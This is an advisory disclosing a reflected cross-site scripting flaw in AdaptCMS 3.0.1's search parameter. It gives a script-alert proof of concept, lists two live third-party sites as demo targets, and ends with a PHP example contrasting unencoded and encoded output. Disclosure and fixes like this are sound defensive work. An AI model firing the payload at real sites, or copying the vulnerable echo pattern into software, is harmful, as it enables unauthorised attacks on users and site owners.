AdaptCMS version 3.0.1 suffers from a cross site scripting vulnerability.
AdaptCMS 3.0.1 Cross Site Scripting Vulnerability
Author : syst3m_f4ult
Homepage : http://www.adaptcms.com/
Vendor : Adapt CMS
Version : 3.0.1 (probably all versions)
Tested on : ubuntu 12.04
Date : 2013-10-11
-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------
The following page is vulnerable to XSS (Method: POST):
http://localhost/search [data[Search][q] parameter]
Insert the following code inside the search box and hit Enter:
<script>alert('syst3m_f4ult')</script>
Demo:
http://www.solitudeisbliss.com/search/
http://www.insanevisions.com/search/
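
The issue above is a POSTed search term echoed into the response without output encoding. As an added illustration (not AdaptCMS code and not from the advisory author), the PHP below contrasts that pattern with encoding at output time and checks the result against the advisory's proof-of-concept string; the function names and the markup are hypothetical.

```php
<?php
// Added illustration: NOT AdaptCMS source. Function names and markup are hypothetical
// stand-ins for a view that echoes the submitted search term back to the user.

// Vulnerable pattern: data[Search][q] is concatenated into HTML without encoding.
function render_search_vulnerable(array $post): string
{
    $q = $post['data']['Search']['q'] ?? '';
    return '<input name="data[Search][q]" value="' . $q . '">'
         . '<h2>Results for: ' . $q . '</h2>';
}

// Hardened pattern: reject non-string input, then encode at output time.
function render_search_safe(array $post): string
{
    $q = $post['data']['Search']['q'] ?? '';
    if (!is_string($q)) {
        $q = ''; // data[Search][q][]=x is parsed by PHP into an array
    }
    // ENT_QUOTES covers both quote styles so the value="" attribute cannot be closed;
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    $e = htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input name="data[Search][q]" value="' . $e . '">'
         . '<h2>Results for: ' . $e . '</h2>';
}

// Constructed request body carrying the proof-of-concept string from the advisory.
$post = ['data' => ['Search' => ['q' => "<script>alert('syst3m_f4ult')</script>"]]];

$unsafe = render_search_vulnerable($post);
$safe   = render_search_safe($post);

// Regression check: the raw tag must survive only in the vulnerable output.
if (strpos($unsafe, '<script>') === false) {
    throw new RuntimeException('vulnerable renderer did not reflect the tag');
}
if (strpos($safe, '<script') !== false || strpos($safe, '&lt;script&gt;') === false) {
    throw new RuntimeException('safe renderer did not encode the tag');
}

echo $safe, PHP_EOL;
```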